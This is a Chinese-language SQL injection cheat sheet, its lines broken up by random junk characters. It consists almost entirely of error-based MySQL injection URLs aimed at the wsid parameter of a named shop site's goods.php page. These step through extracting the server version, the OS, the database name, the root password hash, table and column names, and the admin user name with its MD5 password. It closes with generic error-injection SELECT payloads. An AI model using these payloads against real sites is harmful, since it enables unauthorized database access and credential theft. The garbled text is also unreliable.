判断版本号 % s# x& Y( R2 [/ j' S7 p
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23& D% E0 ]! m( C) S+ y- r1 S2 O
9 P5 W" [2 b, ~$ V/ a判断系统/ b/ V% j, s' J0 G7 ]
# t5 q4 ?8 g2 }8 z
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
8 p; }7 _8 m3 r+ _9 d# c% j) R; i. f/ D/ w
) {: z' Z& |5 d( ]2 ^
3 [4 W% H4 v/ M- ^当前 user()0 U0 j& w, M' g4 _1 Z/ ^ Q4 L0 \
; b7 K6 x: k1 o2 p3 x- \ c& e
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23+ w( M \1 V- z8 F5 L. r7 G8 G
7 {! C8 x# S0 S" k0 v6 d% V9 B
9 T+ C0 u6 c0 v- v& W0 y7 {8 B( Y% n y5 k) N
当前 database()
* b& @, ^' G: L, _9 A$ rhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%238 \1 E/ k% c2 k3 A
+ q9 h9 a/ f7 ` o' D- Y) l. R
3 C- O5 y( N" D$ u, X+ T6 N# ~, j' T: Z; o: [+ ~1 S
$ N% R1 T1 X6 a! d" a: J$ A
root hash+ H( ] Z# S; K0 s1 M7 U
; l! S" i8 x+ h; S @" C7 ~# ahttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
4 ]" N$ h4 |4 k4 H8 j
, |) W3 f) o. }
7 C# h# \+ G8 Y. Y
8 x: J$ x9 F5 T+ p当前 数据库表名
. y* n( c3 R4 ]8 a" e. k7 S. w3 L: X) P3 _; |/ Z7 b! |. |
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
2 h! j7 O. Y1 e9 s- _# p) e2 {1 [# ~+ z$ o" j5 q
, w6 s- W' z8 b# f' {8 k
9 X5 x- p1 y+ {. ~- d
当前 数据库 user_name 字段
+ o* K6 r" [ b C' ~9 v7 Q! o- a' |7 _) ^. l5 N9 A
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 _- R6 ^, X4 a5 E( S# ~4 P
. ]+ v2 V- a4 M5 s当前 数据库 字段 password
1 c8 D8 ^& I7 O2 c7 Vhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%233 d6 J7 V9 z. \8 a
0 _+ d* B0 R# i
: C7 Y# W$ ]6 I8 v% K9 `8 Y J ]: s" M# `
获得 admin passwd(md5), Q8 E% G7 f7 z5 q0 s& [0 @6 T
8 s! P8 o5 k" r" n4 N! j5 F
% _9 Z' U' b5 R2 fhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23& X( F- j4 H7 @, g
" J* s% y0 g- R报错注射' o N; H2 r. z6 I2 Z
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
) c4 i; H. `, H8 q. U- ~2 N7 }% w2 ?: ?9 ]1 h, s7 e0 E+ q
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
$ ~0 J8 M" Y$ f7 d. Y; l) Q \2 e' B4 Y$ B; ?$ d8 g
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) |